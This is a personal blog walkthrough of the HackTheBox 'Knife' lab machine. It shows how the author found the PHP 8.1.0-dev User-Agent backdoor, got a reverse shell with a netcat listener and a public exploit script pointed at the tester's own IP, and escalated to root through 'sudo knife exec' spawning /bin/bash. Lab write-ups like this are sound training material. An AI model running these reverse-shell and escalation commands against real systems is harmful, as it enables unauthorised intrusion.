HackTheBoxPentesting

HackTheBox: Knife

Eric Turner

IP: 10.10.10.242

Box: https://app.hackthebox.eu/machines/Knife

Enumeration

Port Scan

tcp port scan with version detection

Web Server

View of the website

The webpage looks pretty standard. None of the links at the top are functional, it’s just this singular page so that rules out any SQL Injection or Object Reference. Let’s perform a gobuster scan to see if we have anything hidden:

Not much to go off of here either

My next thought is to see if we can exploit directory traversal and pop out into the root drive or something like /etc/passwd, however that did not work.

Trying to attempt directory traversal

Taking another look at the headers, it actually appears this server is running PHP, strangely enough. And it is a dev version:

Doing some googling shows that this was the version that was attacked and a backdoor was inserted into the code for RCE: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/.

This line executes PHP code from within the useragent HTTP header, if the string starts with ‘zerodium’.

Further in this article gives us a python script to gain an RCE on this particular version of PHP found here.

Gaining RCE

Using the script, I open two terminal windows. One, I have nc -lvnp 4444 running, the other:

python3 revshell_php_8.1.0-dev.py http://10.10.10.242 <my-ip> 4444

and as soon as I hit enter, I get a shell for james@knife:

reverse shell

I found a flag in /home/james/user.txt

PrivEsc

We also have the ability to run one program as root with no password:

This seems to be a very powerful automation suite tool. Reading through the help guide, it looks like we can execute our own commands via knife exec [SCRIPT] (options). Using the online help guide, the script needs to be in Ruby, and it does say you can run shell commands.

Another resource I found is how to spawn /bin/bash from ruby by doing

exec "/bin/bash";

So putting those together (be sure to backslash the inner quotes):

sudo /usr/bin/knife exec -E "exec \"/bin/bash\";"
voila!

Conclusions

This was my first unassisted HackTheBox pwn! The starting machines give you a walk-through and do not give you any points for pwning.

I was definitely thrown off at first by how simple the initial web-page was, it required me to go back again to examine the headers to see it was running on PHP, let alone a very exploitable version. Once I found that out, it immediately fast tracked the rest of the exercise!

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.